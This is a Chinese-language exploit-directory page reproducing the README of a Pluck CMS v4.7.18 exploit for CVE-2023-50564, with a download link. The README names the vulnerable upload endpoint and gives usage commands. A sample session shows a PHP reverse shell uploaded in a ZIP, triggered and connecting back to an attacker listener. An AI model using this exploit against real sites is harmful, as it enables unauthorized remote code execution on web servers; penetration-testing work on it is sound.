Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-50564 — 此脚本利用 Pluck CMS v4.7.18 中的文件上传功能,上传恶意 PHP 文件,从而通过反向 Shell 实现远程访问。上传后,该后门赋予攻击者以 Web 服务器权限访问服务器的能力,允许其在系统或网络内执行进一步操作。 | Kitploit
工具/GitHubGitHub/mrterrestrial/cve-2023-50564
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

此脚本利用 Pluck CMS v4.7.18 中的文件上传功能,上传恶意 PHP 文件,从而通过反向 Shell 实现远程访问。上传后,该后门赋予攻击者以 Web 服务器权限访问服务器的能力,允许其在系统或网络内执行进一步操作。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-50564 - Pluck CMS v4.7.18 漏洞利用工具

概述

该脚本利用 Pluck CMS v4.7.18 中的已验证任意文件上传漏洞(CVE-2023-50564)。通过利用此漏洞,已通过身份验证的攻击者可以上传恶意 PHP 文件,从而执行任意代码(此处为反向 Shell)。

漏洞详情

  • CVE ID:CVE-2023-50564
  • 受影响版本:Pluck CMS v4.7.18
  • 类型:已验证的任意文件上传
  • 影响:远程代码执行(RCE)

该漏洞存在于 /admin.php?action=installmodule 端点,该端点允许已通过身份验证的用户上传包含任意文件的 ZIP 文件。通过上传恶意 PHP 文件,此漏洞利用工具会建立指向攻击者的反向 Shell。

需求

  • Python 3.x
  • requests 模块:pip install requests
  • requests-toolbelt 模块:pip install requests-toolbelt

此脚本还需要 Pluck CMS 实例的有效登录信息,包括目标 URL 和密码。

漏洞利用功能

  • 反向 Shell:漏洞利用工具上传一个 PHP 反向 Shell 到目标,并连接回攻击者的机器。
  • 交互式命令执行:一旦反向 Shell 建立,便可以在目标上交互式地执行命令。
  • 密码提示检测:漏洞利用工具检测密码提示(例如 su、sudo -l)并允许用户手动输入。

使用方法

运行漏洞利用工具的步骤

  1. 克隆仓库:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. 安装所需的 Python 包:确保已安装所需包:
    root@kitploit:~
    pip install requests requests-toolbelt
    
  3. 运行漏洞利用工具:脚本需要四个输入:目标 URL、CMS 密码、你的 IP 地址(用于反向 Shell)以及你想要监听的端口。

使用 Python 运行漏洞利用工具:

root@kitploit:~
 python3 exploit.py
  1. 按提示输入:
  • 输入目标 URL(例如 example.com)。
  • 输入用于 CMS 身份验证的密码。
  • 输入你的 IP 地址用于反向 Shell 连接。
  • 输入用于监听反向 Shell 的端口。
  1. 交互式 Shell:反向 Shell 建立后,你将看到 Shell> 提示符,可以与目标系统进行交互。

示例:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

漏洞利用分解

  • 身份验证:脚本使用提供的凭据登录 CMS。
  • 文件上传:它创建一个包含 PHP 反向 Shell 的 ZIP 压缩包,并将其上传到易受攻击的端点(/admin.php?action=installmodule)。
  • 反向 Shell:脚本触发上传的 PHP 文件,建立指向攻击者机器的反向 Shell 连接。

CVE 详情

  • CVE ID:CVE-2023-50564
  • 易受攻击端点:/admin.php?action=installmodule
  • 易受攻击版本:Pluck CMS v4.7.18
  • 类型:已验证的任意文件上传

免责声明

此脚本仅供教育目的和道德黑客使用。只能在你有明确测试权限的环境中使用。作者不对任何滥用此工具的行为负责。

许可证

本项目采用 MIT 许可证 - 详情请参阅 MIT 许可证。

贡献

欢迎 Fork 本仓库并提交 Pull Request。如有任何问题或功能请求,请在 GitHub 上提交 Issue。

下载工具